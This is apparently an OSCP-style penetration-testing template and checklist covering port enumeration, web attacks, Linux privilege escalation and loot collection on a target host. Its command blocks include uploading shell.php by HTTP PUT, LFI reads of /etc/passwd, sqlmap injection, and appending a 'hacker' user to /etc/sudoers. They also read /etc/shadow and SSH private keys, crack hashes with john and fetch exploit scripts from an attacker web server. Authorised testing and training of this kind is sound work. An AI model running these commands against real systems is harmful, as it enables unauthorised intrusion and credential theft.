## Info-sheet - DNS-Domain name: - Host name: - OS: - Server: - Kernel: - Workgroup: - Windows domain: Services and ports: INSERTTCPSCAN ## Recon ``` Always start with a stealthy scan to avoid closing ports. # Syn-scan nmap -sS INSERTIPADDRESS # Scan all ports, might take a while. nmap INSERTIPADDRESS -p- # Service-version, default scripts, OS: nmap INSERTIPADDRESS -sV -sC -O -p 111,222,333 # Scan for UDP nmap INSERTIPADDRESS -sU unicornscan -mU -v -I INSERTIPADDRESS # Connect to udp if one is open nc -u INSERTIPADDRESS 48772 # Monster scan nmap INSERTIPADDRESS -p- -A -T4 -sC ``` ### Port 21 - FTP - FTP-Name: - FTP-version: - Anonymous login: INSERTFTPTEST ``` nmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 INSERTIPADDRESS ``` ### Port 22 - SSH - Name: - Version: - Takes-password: - If you have usernames test login with username:username INSERTSSHCONNECT ``` nc INSERTIPADDRESS 22 ``` ### Port 25 - Name: - Version: - VRFY: INSERTSMTPCONNECT ``` nc -nvv INSERTIPADDRESS 25 HELO foo telnet INSERTIPADDRESS 25 VRFY root nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 INSERTIPADDRESS ``` ### Port 69 - UDP - TFTP This is used for tftp-server. ### Port 110 - Pop3 - Name: - Version: INSERTPOP3CONNECT ``` telnet INSERTIPADDRESS 110 USER pelle@INSERTIPADDRESS PASS admin or: USER pelle PASS admin # List all emails list # Retrieve email number 5, for example retr 9 ``` ### Port 111 - Rpcbind ``` rpcinfo -p INSERTIPADDRESS ``` ### Port 135 - MSRPC Some versions are vulnerable. ### Port 143 - Imap ### Port 139/445 - SMB - Name: - Version: - Domain/workgroup name: - Domain-sid: - Allows unauthenticated login: ``` nmap --script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse,smbv2-enabled.nse INSERTIPADDRESS -p 445 enum4linux -a INSERTIPADDRESS rpcclient -U "" INSERTIPADDRESS srvinfo enumdomusers getdompwinfo querydominfo netshareenum netshareenumall smbclient -L INSERTIPADDRESS smbclient //INSERTIPADDRESS/tmp smbclient \\\\INSERTIPADDRESS\\ipc$ -U john smbclient //INSERTIPADDRESS/ipc$ -U john ``` ### Port 161/162 UDP - SNMP ``` nmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes INSERTIPADDRESS snmp-check -t INSERTIPADDRESS -c public ``` ``` # Common community strings public private community ``` ### Port 554 - RTSP ### Port 1030/1032/1033/1038 Used by RPC to connect in domain network. ## Port 1521 - Oracle - Name: - Version: - Password protected: ``` tnscmd10g version -h INSERTIPADDRESS tnscmd10g status -h INSERTIPADDRESS ``` ### Port 2049 - NFS ``` showmount -e INSERTIPADDRESS If you find anything you can mount it like this: mount INSERTIPADDRESS:/ /tmp/NFS mount -t INSERTIPADDRESS:/ /tmp/NFS ``` ### Port 2100 - Oracle XML DB - Name: - Version: - Default logins: ``` sys:sys scott:tiger ``` Default passwords https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm ### 3306 - MySQL - Name: - Version: ``` nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse INSERTIPADDRESS -p 3306 mysql --host=INSERTIPADDRESS -u root -p ``` ### Port 3339 - Oracle web interface - Basic info about web service (apache, nginx, IIS) - Server: - Scripting language: - Apache Modules: - IP-address: ### Port 80 - Web server - Server: - Scripting language: - Apache Modules: - IP-address: - Domain-name address: INSERTCURLHEADER - Web application (ex, wordpress, joomla, phpmyadmin) - Name: - Version: - Admin-login: ``` # Nikto nikto -h http://INSERTIPADDRESS # Nikto with squid proxy nikto -h INSERTIPADDRESS -useproxy http://INSERTIPADDRESS:4444 # Get header curl -i INSERTIPADDRESS # Get everything curl -i -L INSERTIPADDRESS # Check for title and all links curl INSERTIPADDRESS -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//' # Look at page with just text curl INSERTIPADDRESS -s -L | html2text -width '99' | uniq # Check if it is possible to upload curl -v -X OPTIONS http://INSERTIPADDRESS/ curl -v -X PUT -d '' http://INSERTIPADDRESS/test/shell.php dotdotpwn.pl -m http -h INSERTIPADDRESS -M GET -o unix ``` #### Nikto scan INSERTNIKTOSCAN #### Url brute force ``` # Not recursive dirb http://INSERTIPADDRESS -r -o dirb-INSERTIPADDRESS.txt # Gobuster - remove relevant responde codes (403 for example) gobuster -u http://INSERTIPADDRESS -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e ``` INSERTDIRBSCAN #### Default/Weak login Search documentation for default passwords and test them ``` site:webapplication.com password ``` ``` admin admin admin password admin admin root root root admin root password root password admin username username ``` #### LFI/RFI ``` fimap -u "http://INSERTIPADDRESS/example.php?test=" # Ordered output curl -s http://INSERTIPADDRESS/gallery.php?page=/etc/passwd /root/Tools/Kadimus/kadimus -u http://INSERTIPADDRESS/example.php?page= ``` #### SQL-Injection ``` # Post ./sqlmap.py -r search-test.txt -p tfUPass # Get sqlmap -u "http://INSERTIPADDRESS/index.php?id=1" --dbms=mysql # Crawl sqlmap -u http://INSERTIPADDRESS --dbms=mysql --crawl=3 ``` #### Sql-login-bypass - Open Burp-suite - Make and intercept a request - Send to intruder - Cluster attack. - Paste in sqlibypass-list (https://bobloblaw.gitbooks.io/security/content/sql-injections.html) - Attack - Check for response length variation ### Password brute force - last resort ``` cewl ``` ### Port 443 - HTTPS Heartbleed: ``` # Heartbleed sslscan INSERTIPADDRESS:443 ``` ## Vulnerability analysis Now we have gathered information about the system. Now comes the part where we look for exploits and vulnerabilites and features. ### To try - List of possibilies Add possible exploits here: ### Find sploits - Searchsploit and google Where there are many exploits for a software, use google. It will automatically sort it by popularity. ``` site:exploit-db.com apache 2.4.7 # Remove dos-exploits searchsploit Apache 2.4.7 | grep -v '/dos/' searchsploit Apache | grep -v '/dos/' | grep -vi "tomcat" # Only search the title (exclude the path), add the -t searchsploit -t Apache | grep -v '/dos/' ``` ---------------------------------------------------------------------------- '''''''''''''''''''''''''''''''''' PRIVESC ''''''''''''''''''''''''''''''''' ----------------------------------------------------------------------------- ## Privilege escalation Now we start the whole enumeration-process over gain. - Kernel exploits - Programs running as root - Installed software - Weak/reused/plaintext passwords - Inside service - Suid misconfiguration - World writable scripts invoked by root - Unmounted filesystems Less likely - Private ssh keys - Bad path configuration - Cronjobs ### To-try list Here you will add all possible leads. What to try. ### Useful commands ``` # Spawning shell python -c 'import pty; pty.spawn("/bin/sh")' # Access to more binaries export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin # Set up webserver cd /root/oscp/useful-tools/privesc/linux/privesc-scripts; python -m SimpleHTTPServer 8080 # Download all files wget http://192.168.1.101:8080/ -r; mv 192.168.1.101:8080 exploits; cd exploits; rm index.html; chmod 700 LinEnum.sh linprivchecker.py unix-privesc-check ./LinEnum.sh -t -k password -r LinEnum.txt python linprivchecker.py extended ./unix-privesc-check standard # Writable directories /tmp /var/tmp # Add user to sudoers echo "hacker ALL=(ALL:ALL) ALL" >> /etc/sudoers ``` ### Basic info - OS: - Version: - Kernel version: - Architecture: - Current user: **Devtools:** - GCC: - NC: - WGET: **Users with login:** ``` uname -a env id cat /proc/version cat /etc/issue cat /etc/passwd cat /etc/group cat /etc/shadow cat /etc/hosts # Users with login grep -vE "nologin" /etc/passwd # Priv Enumeration Scripts upload /unix-privesc-check upload /root/Desktop/Backup/Tools/Linux_privesc_tools/linuxprivchecker.py ./ upload /root/Desktop/Backup/Tools/Linux_privesc_tools/LinEnum.sh ./ python linprivchecker.py extended ./LinEnum.sh -t -k password unix-privesc-check ``` ### Kernel exploits ``` site:exploit-db.com kernel version perl /root/oscp/useful-tools/privesc/linux/Linux_Exploit_Suggester/Linux_Exploit_Suggester.pl -k 2.6 python linprivchecker.py extended ``` ### Programs running as root Look for webserver, mysql or anything else like that. ``` # Metasploit ps # Linux ps aux ``` ### Installed software ``` /usr/local/ /usr/local/src /usr/local/bin /opt/ /home /var/ /usr/src/ # Debian dpkg -l # CentOS, OpenSuse, Fedora, RHEL rpm -qa (CentOS / openSUSE ) # OpenBSD, FreeBSD pkg_info ``` ### Weak/reused/plaintext passwords - Check database config-file - Check databases - Check weak passwords ``` username:username username:username1 username:root username:admin username:qwerty username:password ``` - Check plaintext ``` ./LinEnum.sh -t -k password ``` ### Inside service ``` # Linux netstat -anlp netstat -ano ``` ### Suid misconfiguration Binary with suid permission can be run by anyone, but when they are run they are run as root! Example programs: ``` nmap vim nano ``` ``` find / -perm -u=s -type f 2>/dev/null ``` ### Unmounted filesystems Here we are looking for any unmounted filesystems. If we find one we mount it and start the priv-esc process over again. ``` mount -l ``` ### Cronjob Look for anything that is owned by privileged user but writable for you ``` crontab -l ls -alh /var/spool/cron ls -al /etc/ | grep cron ls -al /etc/cron* cat /etc/cron* cat /etc/at.allow cat /etc/at.deny cat /etc/cron.allow cat /etc/cron.deny cat /etc/crontab cat /etc/anacrontab cat /var/spool/cron/crontabs/root ``` ### SSH Keys Check all home directories ``` cat ~/.ssh/authorized_keys cat ~/.ssh/identity.pub cat ~/.ssh/identity cat ~/.ssh/id_rsa.pub cat ~/.ssh/id_rsa cat ~/.ssh/id_dsa.pub cat ~/.ssh/id_dsa cat /etc/ssh/ssh_config cat /etc/ssh/sshd_config cat /etc/ssh/ssh_host_dsa_key.pub cat /etc/ssh/ssh_host_dsa_key cat /etc/ssh/ssh_host_rsa_key.pub cat /etc/ssh/ssh_host_rsa_key cat /etc/ssh/ssh_host_key.pub cat /etc/ssh/ssh_host_key ``` ### Bad path configuration Require user interaction ------------------------------------------------------------------------ ----------------------------- LOOT LOOT LOOT LOOT ---------------------- ------------------------------------------------------------------------ ## Loot **Checklist** - Proof: - Network secret: - Passwords and hashes: - Dualhomed: - Tcpdump: - Interesting files: - Databases: - SSH-keys: - Browser: - Mail: ### Proof ``` /root/proof.txt ``` ### Network secret ``` /root/network-secret.txt ``` ### Passwords and hashes ``` cat /etc/passwd cat /etc/shadow unshadow passwd shadow > unshadowed.txt john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt ``` ### Dualhomed ``` ifconfig ifconfig -a arp -a ``` ### Tcpdump ``` tcpdump -i any -s0 -w capture.pcap tcpdump -i eth0 -w capture -n -U -s 0 src not 192.168.1.X and dst not 192.168.1.X tcpdump -vv -i eth0 src not 192.168.1.X and dst not 192.168.1.X ``` ### Interesting files ``` #Meterpreter search -f *.txt search -f *.zip search -f *.doc search -f *.xls search -f config* search -f *.rar search -f *.docx search -f *.sql .ssh: .bash_history ``` ### Databases ### SSH-Keys ### Browser ### Mail ``` /var/mail /var/spool/mail ``` ### GUI If there is a gui we want to check out the browser. ``` echo $DESKTOP_SESSION echo $XDG_CURRENT_DESKTOP echo $GDMSESSION ``` ## How to replicate: